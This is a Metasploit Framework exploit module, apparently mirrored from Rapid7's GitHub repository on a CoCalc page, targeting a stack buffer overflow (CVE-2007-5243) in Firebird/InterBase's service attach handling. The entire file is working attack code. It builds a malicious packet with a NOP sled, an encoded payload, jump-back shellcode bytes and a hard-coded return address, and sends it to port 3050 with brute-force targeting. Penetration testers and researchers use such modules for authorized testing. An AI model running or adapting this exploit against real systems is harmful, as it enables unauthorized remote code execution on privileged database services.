Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/fb_svc_attach.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::BruteTargets

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name'	=> 'Firebird Relational Database SVC_attach() Buffer Overflow',

17
        'Description'	=> %q{

18
          This module exploits a stack buffer overflow in Borland InterBase

19
          by sending a specially crafted service attach request.

20
        },

21
        'Author' => [

22
          'Ramon de C Valle',

23
          'Adriano Lima <adriano[at]risesecurity.org>',

24
        ],

25
        'Arch'	=> ARCH_X86,

26
        'Platform'	=> 'win',

27
        'References' => [

28
          [ 'CVE', '2007-5243' ],

29
          [ 'OSVDB', '38605' ],

30
          [ 'BID', '25917' ],

31
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],

32
        ],

33
        'Privileged'	=> true,

34
        'License'	=> MSF_LICENSE,

35
        'Payload' => {

36
          'Space' => 256,

37
          'BadChars' => "\x00\x2f\x3a\x40\x5c",

38
          'StackAdjustment' => -3500,

39
        },

40
        'Targets' => [

41
          [ 'Brute Force', {} ],

42
          # 0x0040230b pop ebp; pop ebx; ret

43
          [

44
            'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910',

45
            { 'Length' => [ 308 ], 'Ret' => 0x0040230b }

46
          ],

47
          # Debug

48
          [

49
            'Debug',

50
            { 'Length' => [ 308 ], 'Ret' => 0xaabbccdd }

51
          ],

52
        ],

53
        'DefaultTarget'	=> 1,

54
        'DisclosureDate' => '2007-10-03',

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62


63
    register_options(

64
      [

65
        Opt::RPORT(3050)

66
      ]

67
    )

68
  end

69


70
  def exploit_target(target)

71
    target['Length'].each do |length|

72
      connect

73


74
      # Service attach

75
      op_service_attach = 82

76


77
      remainder = length.remainder(4)

78
      padding = 0

79


80
      if remainder > 0

81
        padding = (4 - remainder)

82
      end

83


84
      buf = ''

85


86
      # Operation/packet type

87
      buf << [op_service_attach].pack('N')

88


89
      # Id

90
      buf << [0].pack('N')

91


92
      # Length

93
      buf << [length].pack('N')

94


95
      # Nop block

96
      buf << make_nops(length - payload.encoded.length - 13)

97


98
      # Payload

99
      buf << payload.encoded

100


101
      # Jump back into the nop block

102
      buf << "\xe9" + [-260].pack('V')

103


104
      # Jump back

105
      buf << "\xeb" + [-7].pack('c')

106


107
      # Random alpha data

108
      buf << rand_text_alpha(2)

109


110
      # Target

111
      buf << [target.ret].pack('V')

112


113
      # Padding

114
      buf << "\x00" * padding

115


116
      # Database parameter block

117


118
      # Length

119
      buf << [1024].pack('N')

120


121
      # Random alpha data

122
      buf << rand_text_alpha(1024)

123


124
      sock.put(buf)

125


126
      # select(nil,nil,nil,4)

127


128
      handler

129
    end

130
  end

131
end

132


133